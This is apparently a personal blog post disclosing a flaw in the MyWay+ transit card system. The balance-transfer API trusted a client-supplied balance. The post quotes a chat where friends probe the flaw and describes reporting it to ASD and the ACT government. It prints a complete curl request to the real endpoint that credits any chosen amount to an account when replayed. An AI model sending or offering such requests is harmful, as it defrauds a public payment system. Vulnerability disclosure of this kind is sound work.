MyWay+'s infinite money glitch

On the 27th of November at 8:29pm, I sent an email to an ASD defence.gov.au address detailing a trivial infinite money glitch in MyWay+.

Between 8:44 and 9:42 of the same day, a Canberra local (who we will call Alice) was live posting about about some problems they were having transferring funds from their old myway card to myway+.

8:44:

Alice

i’ve managed to get in through the in-app browser but balance transfer keeps failing with an in server error lol

oop looks like it’s gone through but returned an error :KEKW:

balance has been claimed but there’s nothing on my account :concern:

is $13 worth calling TC over

👍 1

Carlos

9:36:

Alice

ok i don’t think im gonna call now [image of a $40 account balance]

😮 2

Dan, Erin

ok so did the transaction go through the backend despite the backend check failing and throwing 500, or is the restriction on transferring card value on the frontend and bypassable by just sending more requests

18:44:

Alice

i’m not at a computer rn otherwise i would be trying this but try claiming an already transferred card, duck into the html and delete the disabled attribute on the submit button if there is. see if it makes a call to the back and if that has a checker

cos i’m still perplexed that i managed to claim the same card 3 times because it automatically retried a request 3 times

This of course intrigued me. Surely they aren't just doing trivial client side validation right? Surely not.

Bob

Removing the disabled attr does not work

Ok, so the easiest attack doesn't work.

Faythe

Infinite money glitch

💵 1

Alice

damn, other thing to try is just replay the request it makes when you claim one of your unclaimed cards

As it turns out, this works. They don't even check that the balance that you claim is correct. That means that running this command:

curl 'https://api.abt.prod-tc.nec.com.au/web-portal-business-service/abt/wpbs/c-portal/balance-transfer/transfer-card-balance' \
  -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'authorization: Bearer == INSERT YOUR TOKEN HERE ==' \
  -H 'Origin: https://mywayplus.transport.act.gov.au' -H 'Connection: keep-alive' \
  -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: cross-site' -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' -H 'TE: trailers' \
  --data-raw '[{"mywayCardId":"==any myway card==", "purchaseType":"00010", "purchasePoint":"00001", "paymentType":"BT", "userId":"==user id==", "cardBalance":0.69, "companyId":5, "createdBy":"==user id==", "updatedBy":"==user id=="}]'

Will result in a 69c transaction appearing in your account. You could change cardBalance to be whatever you want and run the request as many times as you wanted.

Bob

Fun fact: I did not have a myway card with 69c on it

That is funny

Alice

heh

Bob

I should probably write an actual disclosure of this.

And that leads me to how I ended up writing an email to ASD cyber assist at 8:29pm. They got back to me at 12 minutes past midnight, saying they had notified the ACT government.

A few days later, I remember reading someone complaining on reddit that balance transfer had been temporarily disabled.

There have been additional limits placed on balance transfers. These limits mean that a myway card that I never transfered can no longer be transfered. Oh well, I guess the ACT government just stole like $110 from me :bkcry:

If you are looking to build a transport ticketing system, steer clear of NEC's ABT (Account Based Ticketing) system. They don't know how to handle your money (in more ways than one...)